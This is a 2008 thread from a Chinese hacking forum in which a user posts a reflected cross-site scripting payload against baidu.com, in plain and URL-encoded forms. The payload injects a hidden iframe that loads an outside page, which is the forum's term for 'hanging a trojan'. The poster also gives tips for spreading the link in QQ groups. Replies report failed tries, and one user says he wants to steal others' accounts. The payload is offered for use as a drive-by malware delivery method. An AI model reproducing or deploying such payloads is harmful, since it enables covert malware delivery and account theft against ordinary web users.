黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航
黑客论坛 - 公共交流区 - 技术交流 - 浏览 - 百度挂马漏洞利用
您是本贴第 350 位浏览者 本版版主
浏览: 百度挂马漏洞利用
  • lijiejie
  • 等级: 银牌VIP
  • 发贴: 31 贴
  • 货币: 0 金币
  • 积分: 1236 分
  • 经验: 676 点
  • 体力: 7130 点
  • 注册: 2008-01-01
#1 浏览 lijiejie 的个人门户
百度挂马漏洞利用
百度首页的这个漏洞大家可以好好地利用,挂马的隐蔽方式很高哦:
给大家做个示范:

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#document.writeln("<iframe%20src=http:\/\/www.lijiejie.cn\/hackgame%20width=100%20height=100><\/iframe>")

这样就挂上http://www.lijiejie.cn/hackgame这个页面,宽和高都是100.
我们再加密一下:

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#document.write(unescape("document.writeln%28%22%3Ciframe%20src%3Dhttp%3A%5C/%5C/www.lijiexxx.cn%5C/go%5C/index.html%20width%3D0%20height%3D0%3E%3C%5C/iframe%3E%22%29"));


不过我测试的时候总是出错。呵呵,用qq传播时要注意后面的标签> 被QQ自动K掉了,需要加上 引号和>来闭合标签。



本贴已被 作者2008-7-8 12:19:38 编辑过
http://www.lijiejie.cn 冰域剑客
<font size=20><a href=http://www.lijiejie.cn>Ljjsoft</a></font>
2008-6-25 14:44:21
  • sunshengjia
  • 等级: 普通用户
  • 发贴: 8 贴
  • 货币: 0 金币
  • 积分: 140 分
  • 经验: 90 点
  • 体力: 505 点
  • 注册: 2007-09-24
#2 浏览 sunshengjia 的个人门户
Re:百度挂马漏洞利用
去玩下看看
2008-6-25 15:21:04
  • zerosoul
  • 等级: 黑客防线技术团队
  • 发贴: 131 贴
  • 货币: 0 金币
  • 积分: 2865 分
  • 经验: 2877 点
  • 体力: 23125 点
  • 注册: 2007-12-13
#3 浏览 zerosoul 的个人门户
Re:百度挂马漏洞利用
没成功..
Computer is my concubine......
My Blog  http://hi.baidu.com/0soul
2008-6-25 17:47:57
  • lijiejie
  • 等级: 银牌VIP
  • 发贴: 31 贴
  • 货币: 0 金币
  • 积分: 1236 分
  • 经验: 676 点
  • 体力: 7130 点
  • 注册: 2008-01-01
#4 浏览 lijiejie 的个人门户
Re:百度挂马漏洞利用
会成功的,你用第一个没有加密的试,绝对可以成功的。呵呵,我昨天发到几个群里,全部被T出来了。
http://www.lijiejie.cn 冰域剑客
<font size=20><a href=http://www.lijiejie.cn>Ljjsoft</a></font>
2008-6-26 13:42:08
  • lanhulove
  • 等级: 普通用户
  • 发贴: 2 贴
  • 货币: 0 金币
  • 积分: 10 分
  • 经验: 10 点
  • 体力: 390 点
  • 注册: 2008-07-22
#5 浏览 lanhulove 的个人门户
Re:百度挂马漏洞利用
呵呵,居然看到你了。
2008-8-13 0:36:43
  • kennywang668
  • 等级: 钻石VIP
  • 发贴: 9 贴
  • 货币: 0 金币
  • 积分: 797 分
  • 经验: 50 点
  • 体力: 3990 点
  • 注册: 2008-08-13
#6 浏览 kennywang668 的个人门户
Re:百度挂马漏洞利用
现在还不会用。。有待学习了我。
初来学习,请大家多多指教!
2008-8-13 1:34:51
  • akmp475
  • 等级: 普通用户
  • 发贴: 1 贴
  • 货币: 0 金币
  • 积分: 5 分
  • 经验: 5 点
  • 体力: 120 点
  • 注册: 2008-09-03
#7 浏览 akmp475 的个人门户
Re:百度挂马漏洞利用
来了我就想学点有用的~因为我的号被盗了`~我要想办法盗别人的`
2008-9-3 23:11:18
  • star影
  • 等级: 银牌VIP
  • 发贴: 54 贴
  • 货币: 0 金币
  • 积分: 627 分
  • 经验: 275 点
  • 体力: 3120 点
  • 注册: 2008-07-05
#8 浏览 star影 的个人门户
Re:百度挂马漏洞利用
楼上的动机不好呢。。。。
2008-9-3 23:52:21
8 1/1 1
 
 

版权所有 2007 黑客防线 廊(公)备13100138000530号

网站基于 Joekoe CMS 3.0 技术架构